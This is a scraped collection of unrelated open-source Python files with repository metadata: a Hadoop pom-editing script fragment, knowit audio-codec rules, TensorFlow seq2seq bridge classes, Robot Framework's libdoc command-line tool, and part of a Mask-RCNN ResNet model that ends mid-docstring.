if branch_to_version != -1 :
    maven_version = "%s.%s" % (branch_to_version, splits[1])
    # Update the pom with the version specified.
    version = doc.getElementsByTagName('version')[0]
    version.firstChild.nodeValue = maven_version
    # Update the pom with correct artifactId specified.
    artifactId = doc.getElementsByTagName('artifactId')[0]
    artifactId.firstChild.nodeValue = "hadoop-hdfs"
    # Add the branch name to the pom
    root = doc.documentElement
    firstChild = root.childNodes[0]
    name = doc.createElementNS(None,'name')
    txt = doc.createTextNode(branch)
    name.appendChild(txt)
    root.insertBefore(name, firstChild)
    modify_pom('highavailability.pom', maven_version)
    modify_pom('raid.pom', maven_version)
    modify_pom('seekablecompression.pom', maven_version)
# Emit the cleaned main pom on stdout (Python 2 print statement).
print get_output(doc)
| {
"content_hash": "3c2a3ab1a0eb3cc7e00827c1bbacc1bd",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 95,
"avg_line_length": 30.869158878504674,
"alnum_prop": 0.670299727520436,
"repo_name": "shakamunyi/hadoop-20",
"id": "ef15718601e9f185b60c2219cb251f354d75a939",
"size": "3326",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "edit_generated_pom.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import typing
from decimal import Decimal
from logging import NullHandler, getLogger
from knowit.core import Rule
logger = getLogger(__name__)
logger.addHandler(NullHandler())
class AtmosRule(Rule):
    """Atmos rule: tag the codec when the commercial format name reports Atmos."""

    def __init__(self, config: typing.Mapping[str, typing.Mapping], name: str,
                 **kwargs):
        """Initialize an Atmos rule."""
        super().__init__(name, **kwargs)
        self.audio_codecs = getattr(config, 'AudioCodec')

    def execute(self, props, pv_props, context):
        """Execute the rule against properties."""
        selected_profile = context.get('profile') or 'default'
        commercial = pv_props.get('format_commercial')
        # Nothing to do unless the commercial format mentions Atmos.
        if not commercial or 'atmos' not in commercial.lower():
            return
        if 'codec' in props:
            atmos_codec = getattr(self.audio_codecs['ATMOS'], selected_profile)
            props['codec'] = [props['codec'], atmos_codec]
class AudioChannelsRule(Rule):
    """Audio Channel rule."""

    # channels_count -> conventional channel layout name
    mapping = {
        1: '1.0',
        2: '2.0',
        6: '5.1',
        8: '7.1',
    }

    def execute(self, props, pv_props, context):
        """Execute the rule against properties.

        Derives a channel layout (e.g. '5.1') from the reported channel
        positions when their sum matches ``channels_count``; otherwise falls
        back to the static mapping, then to the highest candidate found.
        """
        count = props.get('channels_count')
        if count is None:
            return

        channels = self.mapping.get(count) if isinstance(count, int) else None
        positions = pv_props.get('channel_positions') or []
        positions = positions if isinstance(positions, list) else [positions]
        candidate = 0
        for position in positions:
            if not position:
                continue
            c = Decimal('0.0')
            for i in position.split('/'):
                try:
                    c += Decimal(i)
                except (ValueError, ArithmeticError):
                    # Bug fix: Decimal() raises decimal.InvalidOperation (an
                    # ArithmeticError subclass) on malformed input, not
                    # ValueError, so the previous handler never caught it and
                    # a bad position token crashed the rule.
                    logger.debug('Invalid %s: %s', self.description, i)
            # e.g. Decimal('5.1') -> 5 main + 1 LFE = 6 actual channels
            c_count = int(c) + int(round((c - int(c)) * 10))
            if c_count == count:
                return str(c)
            candidate = max(candidate, c)

        if channels:
            return channels
        if candidate:
            return candidate
        self.report(positions, context)
class DtsHdRule(Rule):
    """DTS-HD rule: upgrade a DTS codec to DTS-HD for MA/HRA profiles."""
    def __init__(self, config: typing.Mapping[str, typing.Mapping], name: str,
                 **kwargs):
        """Initialize a DTS-HD Rule."""
        super().__init__(name, **kwargs)
        self.audio_codecs = getattr(config, 'AudioCodec')
        self.audio_profiles = getattr(config, 'AudioProfile')
    @classmethod
    def _redefine(cls, props, name, index):
        # Replace a list-valued property with its element at `index`,
        # dropping the property entirely when that element is None.
        actual = props.get(name)
        if isinstance(actual, list):
            value = actual[index]
            if value is None:
                del props[name]
            else:
                props[name] = value
    def execute(self, props, pv_props, context):
        """Execute the rule against properties."""
        profile = context.get('profile') or 'default'
        # DTS codec + (MA or HRA) profile identifies a DTS-HD track.
        if props.get('codec') == getattr(self.audio_codecs['DTS'],
                                         profile) and props.get('profile') in (
                getattr(self.audio_profiles['MA'], profile),
                getattr(self.audio_profiles['HRA'], profile)):
            props['codec'] = getattr(self.audio_codecs['DTS-HD'], profile)
| {
"content_hash": "564165acc1b4239c3ba1c76898d7f219",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 91,
"avg_line_length": 31.682692307692307,
"alnum_prop": 0.5450682852807284,
"repo_name": "ratoaq2/knowit",
"id": "b35d36437044f616df733d43900cc6f958896e0f",
"size": "3295",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "knowit/rules/audio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "102251"
}
],
"symlink_target": ""
} |
"""Bridges transform the state from the encoders so they fit the decoder
Inspired by OpenNMT & google/seq2seq
## Available bridges
@@NoBridge
@@ZeroBridge
@@DenseBridge
"""
import tensorflow as tf
import tensorflow.keras as keras
class Bridge:
    """Transforms the state from the encoders so they fit the decoder"""
    def __call__(self, zero_state, init_state):
        """
        Creates a state for a cell that accepts `zero_state` type of states. Uses
        `init_state` as the input.
        Args:
            zero_state (tf.Tensor): the result of cell#zero_state().
            init_state (tf.Tensor): initialization for the state.
              [batch_size, size]
        Returns:
            init_state (tf.Tensor): same size as `zero_state`, initialized with
              `init_state`.
        Raises:
            NotImplementedError: always; subclasses must implement __call__.
        """
        raise NotImplementedError
class NoBridge(Bridge):
    """Pass the encoder state through unchanged, ignoring the decoder zero state."""
    def __call__(self, zero_state, init_state):
        return init_state
class ZeroBridge(Bridge):
    """Ignore the encoder state entirely; the decoder starts from its zero state."""
    def __call__(self, zero_state, init_state):
        return zero_state
class DenseBridge(Bridge):
    """Project the encoder state through a dense layer to fit the decoder state."""
    def __call__(self, zero_state, init_state):
        # Flatten the (possibly nested) state into a flat list of tensors.
        flat_states = tf.contrib.framework.nest.flatten(zero_state)
        # Last-dimension size of each flattened state tensor.
        sizes = [t.get_shape()[-1].value for t in flat_states]
        # A single projection covering the concatenation of all needed states.
        projected = keras.layers.Dense(sum(sizes))(init_state)
        # Split back into per-state tensors of the expected sizes.
        pieces = tf.split(projected, sizes, axis=1)
        # Restore the original nesting structure of the requested states.
        return tf.contrib.framework.nest.pack_sequence_as(zero_state, pieces)
| {
"content_hash": "6c0e04f0275f9315a5dde38d9124beef",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 81,
"avg_line_length": 28.3,
"alnum_prop": 0.6378091872791519,
"repo_name": "jpbottaro/anna",
"id": "7f8d3f66b0ef5ef0af70bbc809ee13ad062126a2",
"size": "1698",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "anna/model/bridge.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1203644"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "122148"
}
],
"symlink_target": ""
} |
USAGE = """robot.libdoc -- Robot Framework library documentation generator
Version: <VERSION>
Usage: python -m robot.libdoc [options] library output_file
or: python -m robot.libdoc [options] library list|show|version [names]
Libdoc tool can generate keyword documentation in HTML and XML formats both
for test libraries and resource files. HTML format is suitable for humans and
XML specs for RIDE and other tools. Libdoc also has few special commands to
show library or resource information on the console.
Libdoc supports all library and resource types and also earlier generated XML
specs can be used as input. If a library needs arguments, they must be given
as part of the library name and separated by two colons, for example, like
`LibraryName::arg1::arg2`.
Options
=======
-f --format HTML|XML Specifies whether to generate HTML or XML output.
If this options is not used, the format is got
from the extension of the output file.
-n --name newname Sets the name of the documented library or resource.
-v --version newversion Sets the version of the documented library or
resource.
-P --pythonpath path * Additional locations where to search for libraries
and resources.
-E --escape what:with * Escapes characters which are problematic in console.
'what' is the name of the character to escape and
'with' is the string to escape it with.
<-------------------ESCAPES------------------------>
-h -? --help Print this help.
Creating documentation
======================
When creating documentation in HTML or XML format, the output file must
be specified as a second argument after the library/resource name or path.
Output format is got automatically from the extension but can also be set
with `--format` option.
Examples:
python -m robot.libdoc src/MyLib.py doc/MyLib.html
jython -m robot.libdoc MyJavaLibrary.java MyJavaLibrary.html
python -m robot.libdoc --name MyLib Remote::10.0.0.42:8270 MyLib.xml
Viewing information on console
==============================
Libdoc has three special commands to show information on the console. These
commands are used instead of the name of the output file, and they can also
take additional arguments.
list: List names of the keywords the library/resource contains. Can be
limited to show only certain keywords by passing optional patterns as
arguments. Keyword is listed if its name contains any given pattern.
show: Show library/resource documentation. Can be limited to show only
certain keywords by passing names as arguments. Keyword is shown if
its name matches any given name. Special argument `intro` will show
the library introduction and importing sections.
version: Show library version
Optional patterns given to `list` and `show` are case and space insensitive.
Both also accept `*` and `?` as wildcards.
Examples:
python -m robot.libdoc Dialogs list
python -m robot.libdoc Selenium2Library list browser
python -m robot.libdoc Remote::10.0.0.42:8270 show
python -m robot.libdoc Dialogs show PauseExecution execute*
python -m robot.libdoc Selenium2Library show intro
python -m robot.libdoc Selenium2Library version
Alternative execution
=====================
Libdoc works with all interpreters supported by Robot Framework (Python,
Jython and IronPython). In the examples above libdoc is executed as an
installed module, but it can also be executed as a script like
`python path/robot/libdoc.py`.
For more information see libdoc section in Robot Framework User Guide at
http://code.google.com/p/robotframework/wiki/UserGuide
"""
import sys
import os
# Allows running as a script. __name__ check needed with multiprocessing:
# http://code.google.com/p/robotframework/issues/detail?id=1137
if 'robot' not in sys.modules and __name__ == '__main__':
import pythonpathsetter
from robot.utils import Application
from robot.errors import DataError
from robot.libdocpkg import LibraryDocumentation, ConsoleViewer
class LibDoc(Application):
    """Command line application that generates library documentation."""

    def __init__(self):
        Application.__init__(self, USAGE, arg_limits=(2,), auto_version=False)

    def validate(self, options, arguments):
        """Validate arguments: either a console command or exactly two args."""
        if ConsoleViewer.handles(arguments[1]):
            ConsoleViewer.validate_command(arguments[1], arguments[2:])
            return options, arguments
        if len(arguments) > 2:
            raise DataError('Only two arguments allowed when writing output.')
        return options, arguments

    def main(self, args, name='', version='', format=None):
        """Generate documentation or dispatch to a console viewer command."""
        lib_or_res, output = args[0], args[1]
        libdoc = LibraryDocumentation(lib_or_res, name, version)
        if not ConsoleViewer.handles(output):
            libdoc.save(output, self._get_format(format, output))
            self.console(os.path.abspath(output))
        else:
            ConsoleViewer(libdoc).view(output, *args[2:])

    def _get_format(self, format, output):
        """Resolve output format from option or file extension; HTML/XML only."""
        chosen = (format or os.path.splitext(output)[1][1:]).upper()
        if chosen not in ('HTML', 'XML'):
            raise DataError("Format must be either 'HTML' or 'XML', got '%s'."
                            % chosen)
        return chosen
def libdoc_cli(args):
    """Executes libdoc similarly as from the command line.

    :param args: command line arguments as a list of strings.

    Example:
        libdoc_cli(['--name', 'Something', 'MyLibrary.py', 'doc.html'])
    """
    app = LibDoc()
    app.execute_cli(args)
def libdoc(library_or_resource, outfile, name='', version='', format=None):
    """Executes libdoc.

    Arguments are same as command line options to libdoc.py.

    Example:
        libdoc('MyLibrary.py', 'MyLibrary.html', version='1.0')
    """
    app = LibDoc()
    app.execute(library_or_resource, outfile, name=name, version=version,
                format=format)
# Allow running libdoc directly as a script (`python libdoc.py ...`).
if __name__ == '__main__':
    libdoc_cli(sys.argv[1:])
| {
"content_hash": "1865120db17a2c2848beab94ad03048c",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 84,
"avg_line_length": 38.63870967741936,
"alnum_prop": 0.6842544665219569,
"repo_name": "Senseg/robotframework",
"id": "cbc208f8cf995cc86c5e459559d05f31c9db5096",
"size": "6618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/robot/libdoc.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "716"
},
{
"name": "Java",
"bytes": "48873"
},
{
"name": "JavaScript",
"bytes": "149654"
},
{
"name": "Python",
"bytes": "1637427"
},
{
"name": "Shell",
"bytes": "1323"
}
],
"symlink_target": ""
} |
"""Mask-RCNN (via ResNet) model definition.
Uses the ResNet model as a basis.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import anchors
from object_detection import balanced_positive_negative_sampler
from mlperf_compliance import mlperf_log
# Batch-normalization hyperparameters used throughout the ResNet backbone.
_BATCH_NORM_DECAY = 0.997
_BATCH_NORM_EPSILON = 1e-4
# Maximum ResNet feature level (presumably c5 — used outside this chunk).
_RESNET_MAX_LEVEL = 5
# Small constant to avoid division by zero.
_EPSILON = 1e-8
# Number of boxes processed per tile by the padded NMS implementation below.
_NMS_TILE_SIZE = 512
def batch_norm_relu(inputs,
                    is_training_bn,
                    relu=True,
                    init_zero=False,
                    data_format='channels_last',
                    name=None):
  """Applies batch normalization, optionally followed by a ReLU.

  Args:
    inputs: `Tensor` of shape `[batch, channels, ...]`.
    is_training_bn: `bool` for whether the model is training.
    relu: `bool` if False, omits the ReLU operation.
    init_zero: `bool` if True, initializes scale parameter of batch
      normalization with 0 instead of 1 (default).
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.
    name: the name of the batch normalization layer.

  Returns:
    A normalized `Tensor` with the same `data_format`.
  """
  # Zero-initialized gamma makes the block start as an identity mapping.
  gamma_initializer = (
      tf.zeros_initializer() if init_zero else tf.ones_initializer())
  bn_axis = 1 if data_format == 'channels_first' else 3
  normalized = tf.layers.batch_normalization(
      inputs=inputs,
      axis=bn_axis,
      momentum=_BATCH_NORM_DECAY,
      epsilon=_BATCH_NORM_EPSILON,
      center=True,
      scale=True,
      training=is_training_bn,
      fused=True,
      gamma_initializer=gamma_initializer,
      name=name)
  return tf.nn.relu(normalized) if relu else normalized
def fixed_padding(inputs, kernel_size, data_format='channels_last'):
  """Pads the input along the spatial dimensions independently of input size.

  Args:
    inputs: `Tensor` of size `[batch, channels, height, width]` or
      `[batch, height, width, channels]` depending on `data_format`.
    kernel_size: `int` kernel size to be used for `conv2d` or `max_pool2d`
      operations. Should be a positive integer.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    A padded `Tensor` of the same `data_format` with size either intact
    (if `kernel_size == 1`) or padded (if `kernel_size > 1`).
  """
  total = kernel_size - 1
  before = total // 2
  after = total - before
  # Pad only the two spatial dimensions; their position depends on layout.
  if data_format == 'channels_first':
    paddings = [[0, 0], [0, 0], [before, after], [before, after]]
  else:
    paddings = [[0, 0], [before, after], [before, after], [0, 0]]
  return tf.pad(inputs, paddings)
def conv2d_fixed_padding(inputs,
                         filters,
                         kernel_size,
                         strides,
                         data_format='channels_last'):
  """Strided 2-D convolution with explicit padding.

  The padding is consistent and is based only on `kernel_size`, not on the
  dimensions of `inputs` (as opposed to using `tf.layers.conv2d` alone).

  Args:
    inputs: `Tensor` of size `[batch, channels, height_in, width_in]`.
    filters: `int` number of filters in the convolution.
    kernel_size: `int` size of the kernel to be used in the convolution.
    strides: `int` strides of the convolution.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    A `Tensor` of shape `[batch, filters, height_out, width_out]`.
  """
  # For strided convolutions, pad explicitly so the output size depends only
  # on kernel_size, then use VALID padding in the conv itself.
  if strides > 1:
    inputs = fixed_padding(inputs, kernel_size, data_format=data_format)
  conv_padding = 'SAME' if strides == 1 else 'VALID'
  return tf.layers.conv2d(
      inputs=inputs,
      filters=filters,
      kernel_size=kernel_size,
      strides=strides,
      padding=conv_padding,
      use_bias=False,
      kernel_initializer=tf.variance_scaling_initializer(),
      data_format=data_format)
def residual_block(inputs,
                   filters,
                   is_training_bn,
                   strides,
                   use_projection=False,
                   data_format='channels_last'):
  """Standard building block for residual networks with BN after convolutions.

  Args:
    inputs: `Tensor` of size `[batch, channels, height, width]`.
    filters: `int` number of filters for both 3x3 convolutions.
    is_training_bn: `bool` for whether the model is in training.
    strides: `int` block stride. If greater than 1, this block will ultimately
      downsample the input.
    use_projection: `bool` for whether this block should use a projection
      shortcut (versus the default identity shortcut). This is usually `True`
      for the first block of a block group, which may change the number of
      filters and the resolution.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    The output `Tensor` of the block.
  """
  if use_projection:
    # 1x1 projection shortcut matches the filter count and resolution of the
    # main path when they change at the start of a block group.
    shortcut = conv2d_fixed_padding(
        inputs=inputs,
        filters=filters,
        kernel_size=1,
        strides=strides,
        data_format=data_format)
    shortcut = batch_norm_relu(
        shortcut, is_training_bn, relu=False, data_format=data_format)
  else:
    shortcut = inputs
  residual = conv2d_fixed_padding(
      inputs=inputs,
      filters=filters,
      kernel_size=3,
      strides=strides,
      data_format=data_format)
  residual = batch_norm_relu(residual, is_training_bn, data_format=data_format)
  residual = conv2d_fixed_padding(
      inputs=residual,
      filters=filters,
      kernel_size=3,
      strides=1,
      data_format=data_format)
  # Last BN is zero-initialized so the block starts close to identity.
  residual = batch_norm_relu(
      residual,
      is_training_bn,
      relu=False,
      init_zero=True,
      data_format=data_format)
  return tf.nn.relu(residual + shortcut)
def bottleneck_block(inputs,
                     filters,
                     is_training_bn,
                     strides,
                     use_projection=False,
                     data_format='channels_last'):
  """Bottleneck block variant for residual networks with BN after convolutions.

  Args:
    inputs: `Tensor` of size `[batch, channels, height, width]`.
    filters: `int` number of filters for the first two convolutions. The
      third and final convolution uses 4 times as many filters.
    is_training_bn: `bool` for whether the model is in training.
    strides: `int` block stride. If greater than 1, this block will ultimately
      downsample the input.
    use_projection: `bool` for whether this block should use a projection
      shortcut (versus the default identity shortcut). This is usually `True`
      for the first block of a block group, which may change the number of
      filters and the resolution.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    The output `Tensor` of the block.
  """
  if use_projection:
    # Bottleneck blocks end with 4x the filters, so the projection shortcut
    # must match that expanded output depth.
    shortcut = conv2d_fixed_padding(
        inputs=inputs,
        filters=4 * filters,
        kernel_size=1,
        strides=strides,
        data_format=data_format)
    shortcut = batch_norm_relu(
        shortcut, is_training_bn, relu=False, data_format=data_format)
  else:
    shortcut = inputs
  # Main path: 1x1 reduce -> 3x3 spatial (strided) -> 1x1 expand.
  residual = conv2d_fixed_padding(
      inputs=inputs,
      filters=filters,
      kernel_size=1,
      strides=1,
      data_format=data_format)
  residual = batch_norm_relu(residual, is_training_bn, data_format=data_format)
  residual = conv2d_fixed_padding(
      inputs=residual,
      filters=filters,
      kernel_size=3,
      strides=strides,
      data_format=data_format)
  residual = batch_norm_relu(residual, is_training_bn, data_format=data_format)
  residual = conv2d_fixed_padding(
      inputs=residual,
      filters=4 * filters,
      kernel_size=1,
      strides=1,
      data_format=data_format)
  # Last BN is zero-initialized so the block starts close to identity.
  residual = batch_norm_relu(
      residual,
      is_training_bn,
      relu=False,
      init_zero=True,
      data_format=data_format)
  return tf.nn.relu(residual + shortcut)
def block_group(inputs,
                filters,
                block_fn,
                blocks,
                strides,
                is_training_bn,
                name,
                data_format='channels_last'):
  """Creates one group of blocks for the ResNet model.

  Args:
    inputs: `Tensor` of size `[batch, channels, height, width]`.
    filters: `int` number of filters for the first convolution of the layer.
    block_fn: `function` for the block to use within the model.
    blocks: `int` number of blocks contained in the layer.
    strides: `int` stride to use for the first convolution of the layer. If
      greater than 1, this layer will downsample the input.
    is_training_bn: `bool` for whether the model is training.
    name: `str` name for the Tensor output of the block layer.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    The output `Tensor` of the block layer.
  """
  # Only the first block of a group downsamples and projects the shortcut;
  # the remaining blocks keep resolution and use identity shortcuts.
  outputs = block_fn(
      inputs,
      filters,
      is_training_bn,
      strides,
      use_projection=True,
      data_format=data_format)
  for _ in range(blocks - 1):
    outputs = block_fn(
        outputs, filters, is_training_bn, 1, data_format=data_format)
  return tf.identity(outputs, name)
def resnet_v1_generator(block_fn, layers, data_format='channels_last'):
  """Generator of ResNet v1 model with classification layers removed.

  Our actual ResNet network. We return the output of c2, c3, c4, c5.
  N.B. batch norm is always run with trained parameters, as we use very small
  batches when training the object layers.

  Args:
    block_fn: `function` for the block to use within the model. Either
      `residual_block` or `bottleneck_block`.
    layers: list of 4 `int`s denoting the number of blocks to include in each
      of the 4 block groups. Each group consists of blocks that take inputs of
      the same resolution.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    Model `function` that takes in `inputs` and `is_training_bn` and returns
    the output `Tensor` of the ResNet model.
  """

  def model(inputs, is_training_bn=False):
    """Creation of the model graph."""
    # Stem: strided 7x7 conv followed by a strided 3x3 max pool.
    inputs = conv2d_fixed_padding(
        inputs=inputs,
        filters=64,
        kernel_size=7,
        strides=2,
        data_format=data_format)
    inputs = tf.identity(inputs, 'initial_conv')
    inputs = batch_norm_relu(inputs, is_training_bn, data_format=data_format)
    inputs = tf.layers.max_pooling2d(
        inputs=inputs,
        pool_size=3,
        strides=2,
        padding='SAME',
        data_format=data_format)
    inputs = tf.identity(inputs, 'initial_max_pool')
    # (filters, blocks, strides, name) for the four block groups; all but the
    # first downsample by 2.
    group_specs = [
        (64, layers[0], 1, 'block_group1'),
        (128, layers[1], 2, 'block_group2'),
        (256, layers[2], 2, 'block_group3'),
        (512, layers[3], 2, 'block_group4'),
    ]
    features = []
    net = inputs
    for group_filters, group_blocks, group_strides, group_name in group_specs:
      net = block_group(
          inputs=net,
          filters=group_filters,
          blocks=group_blocks,
          strides=group_strides,
          block_fn=block_fn,
          is_training_bn=is_training_bn,
          name=group_name,
          data_format=data_format)
      features.append(net)
    # (c2, c3, c4, c5)
    return tuple(features)

  return model
def resnet_v1(resnet_depth, data_format='channels_last'):
  """Returns the ResNet v1 backbone model function for the given depth.

  Args:
    resnet_depth: `int` depth of the ResNet; one of 18, 34, 50, 101, 152, 200.
    data_format: `str` either "channels_first" for `[batch, channels, height,
      width]` or "channels_last" for `[batch, height, width, channels]`.

  Returns:
    Model `function` produced by `resnet_v1_generator` for the requested
    depth; it takes `inputs` and `is_training_bn` and returns the
    (c2, c3, c4, c5) feature tensors.

  Raises:
    ValueError: if `resnet_depth` is not one of the supported depths.
  """
  model_params = {
      18: {'block': residual_block, 'layers': [2, 2, 2, 2]},
      34: {'block': residual_block, 'layers': [3, 4, 6, 3]},
      50: {'block': bottleneck_block, 'layers': [3, 4, 6, 3]},
      101: {'block': bottleneck_block, 'layers': [3, 4, 23, 3]},
      152: {'block': bottleneck_block, 'layers': [3, 8, 36, 3]},
      200: {'block': bottleneck_block, 'layers': [3, 24, 36, 3]}
  }
  if resnet_depth not in model_params:
    # Format the depth into the message instead of passing a second positional
    # arg to ValueError, which would render as a tuple, e.g.
    # "('Not a valid resnet_depth:', 42)".
    raise ValueError('Not a valid resnet_depth: {}'.format(resnet_depth))
  mlperf_log.maskrcnn_print(key=mlperf_log.BACKBONE,
                            value='resnet{}'.format(resnet_depth))
  params = model_params[resnet_depth]
  return resnet_v1_generator(
      params['block'], params['layers'], data_format)
def nearest_upsampling(data, scale):
  """Nearest neighbor upsampling implementation.

  Args:
    data: A tensor with a shape of [batch, height_in, width_in, channels].
    scale: An integer multiple to scale resolution of input data.

  Returns:
    data_up: A tensor with a shape of
      [batch, height_in*scale, width_in*scale, channels]. Same dtype as input
      data.
  """
  with tf.name_scope('nearest_upsampling'):
    batch, height, width, channels = data.get_shape().as_list()
    if batch is None:
      batch = -1
    # Insert singleton axes after each spatial dimension and broadcast
    # against ones, replicating every pixel `scale` times in both height and
    # width; the nearest pixel is selected implicitly via broadcasting.
    replicator = tf.ones([1, 1, scale, 1, scale, 1], dtype=data.dtype)
    expanded = tf.reshape(data, [batch, height, 1, width, 1, channels])
    upsampled = expanded * replicator
    return tf.reshape(
        upsampled, [batch, height * scale, width * scale, channels])
def _bbox_overlap(boxes, gt_boxes):
  """Calculates the overlap between proposal and ground truth boxes.

  Some `gt_boxes` may have been padded. The returned `iou` tensor for these
  boxes will be -1.

  Args:
    boxes: a tensor with a shape of [batch_size, N, 4]. N is the number of
      proposals before groundtruth assignment (e.g., rpn_post_nms_topn). The
      last dimension is the pixel coordinates in [ymin, xmin, ymax, xmax] form.
    gt_boxes: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES, 4]. This
      tensor might have paddings with a negative value.

  Returns:
    iou: a tensor with as a shape of [batch_size, N, MAX_NUM_INSTANCES].
  """
  with tf.name_scope('bbox_overlap'):
    box_ymin, box_xmin, box_ymax, box_xmax = tf.split(
        value=boxes, num_or_size_splits=4, axis=2)
    gt_ymin, gt_xmin, gt_ymax, gt_xmax = tf.split(
        value=gt_boxes, num_or_size_splits=4, axis=2)
    # Transpose gt coordinates to [batch, 1, MAX_NUM_INSTANCES] so that
    # broadcasting against [batch, N, 1] yields pairwise comparisons.
    gt_ymin_t = tf.transpose(gt_ymin, [0, 2, 1])
    gt_xmin_t = tf.transpose(gt_xmin, [0, 2, 1])
    gt_ymax_t = tf.transpose(gt_ymax, [0, 2, 1])
    gt_xmax_t = tf.transpose(gt_xmax, [0, 2, 1])
    # Intersection rectangle, clamped to zero area when boxes are disjoint.
    i_xmin = tf.maximum(box_xmin, gt_xmin_t)
    i_xmax = tf.minimum(box_xmax, gt_xmax_t)
    i_ymin = tf.maximum(box_ymin, gt_ymin_t)
    i_ymax = tf.minimum(box_ymax, gt_ymax_t)
    i_area = (tf.maximum(i_xmax - i_xmin, 0) *
              tf.maximum(i_ymax - i_ymin, 0))
    # Union area, with a small epsilon to avoid divide-by-zero.
    box_area = (box_ymax - box_ymin) * (box_xmax - box_xmin)
    gt_area = (gt_ymax - gt_ymin) * (gt_xmax - gt_xmin)
    u_area = box_area + tf.transpose(gt_area, [0, 2, 1]) - i_area + 1e-8
    iou = i_area / u_area
    # Padded gt boxes are negative, making i_xmin negative; flag them as -1.
    padding_mask = tf.less(i_xmin, tf.zeros_like(i_xmin))
    return tf.where(padding_mask, -tf.ones_like(iou), iou)
def _add_class_assignments(iou, scaled_gt_boxes, gt_labels):
  """Computes object category assignment for each box.

  Args:
    iou: a tensor for the iou matrix with a shape of
      [batch_size, K, MAX_NUM_INSTANCES]. K is the number of post-nms RoIs
      (i.e., rpn_post_nms_topn).
    scaled_gt_boxes: a tensor with a shape of
      [batch_size, MAX_NUM_INSTANCES, 4]. This tensor might have paddings with
      negative values. The coordinates of gt_boxes are in the pixel coordinates
      of the scaled image scale.
    gt_labels: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES]. This
      tensor might have paddings with a value of -1.

  Returns:
    max_boxes: a tensor with a shape of [batch_size, K, 4], representing
      the ground truth coordinates of each roi.
    max_classes: a int32 tensor with a shape of [batch_size, K], representing
      the ground truth class of each roi.
    max_overlap: a tensor with a shape of [batch_size, K], representing
      the maximum overlap of each roi.
    argmax_iou: a tensor with a shape of [batch_size, K], representing the iou
      argmax.
  """
  with tf.name_scope('add_class_assignments'):
    batch_size, _, _ = iou.get_shape().as_list()
    # Index of the best-overlapping ground truth box for every RoI.
    argmax_iou = tf.argmax(iou, axis=2, output_type=tf.int32)
    # Convert per-row argmax indices into flat indices over the flattened
    # [batch * MAX_NUM_INSTANCES] gt tensors by offsetting each batch row by
    # its row index times the number of gt slots.
    indices = tf.reshape(
        argmax_iou + tf.expand_dims(
            tf.range(batch_size) * tf.shape(gt_labels)[1], 1), [-1])
    max_classes = tf.reshape(
        tf.gather(tf.reshape(gt_labels, [-1, 1]), indices), [batch_size, -1])
    max_overlap = tf.reduce_max(iou, axis=2)
    # RoIs with zero overlap against every gt box are treated as background.
    bg_mask = tf.equal(max_overlap, tf.zeros_like(max_overlap))
    max_classes = tf.where(bg_mask, tf.zeros_like(max_classes), max_classes)
    max_boxes = tf.reshape(
        tf.gather(tf.reshape(scaled_gt_boxes, [-1, 4]), indices),
        [batch_size, -1, 4])
    # Background RoIs get an all-zero box target.
    max_boxes = tf.where(
        tf.tile(tf.expand_dims(bg_mask, axis=2), [1, 1, 4]),
        tf.zeros_like(max_boxes), max_boxes)
    return max_boxes, max_classes, max_overlap, argmax_iou
def encode_box_targets(boxes, gt_boxes, gt_labels, bbox_reg_weights):
  """Encodes predicted boxes with respect to ground truth boxes."""
  with tf.name_scope('encode_box_targets'):
    box_targets = anchors.batch_encode_box_targets_op(
        boxes, gt_boxes, bbox_reg_weights)
    # Background targets (label == 0) get an all-zero box encoding.
    is_background = tf.equal(gt_labels, tf.zeros_like(gt_labels))
    background_mask = tf.tile(
        tf.expand_dims(is_background, axis=2), [1, 1, 4])
    return tf.where(
        background_mask, tf.zeros_like(box_targets), box_targets)
def proposal_label_op(boxes, gt_boxes, gt_labels, image_info,
                      batch_size_per_im=512, fg_fraction=0.25, fg_thresh=0.5,
                      bg_thresh_hi=0.5, bg_thresh_lo=0., is_training=True):
  """Assigns the proposals with ground truth labels and performs subsmpling.

  Given proposal `boxes`, `gt_boxes`, and `gt_labels`, the function uses the
  following algorithm to generate the final `batch_size_per_im` RoIs.
  1. Calculates the IoU between each proposal box and each gt_boxes.
  2. Assigns each proposal box with a ground truth class and box label by
     choosing the largest overlap.
  3. Samples `batch_size_per_im` boxes from all proposal boxes, and returns
     box_targets, class_targets, and RoIs.
  The reference implementations of #1 and #2 are here: https://github.com/facebookresearch/Detectron/blob/master/detectron/datasets/json_dataset.py  # pylint: disable=line-too-long
  The reference implementation of #3 is here: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py.  # pylint: disable=line-too-long

  Args:
    boxes: a tensor with a shape of [batch_size, N, 4]. N is the number of
      proposals before groundtruth assignment (e.g., rpn_post_nms_topn). The
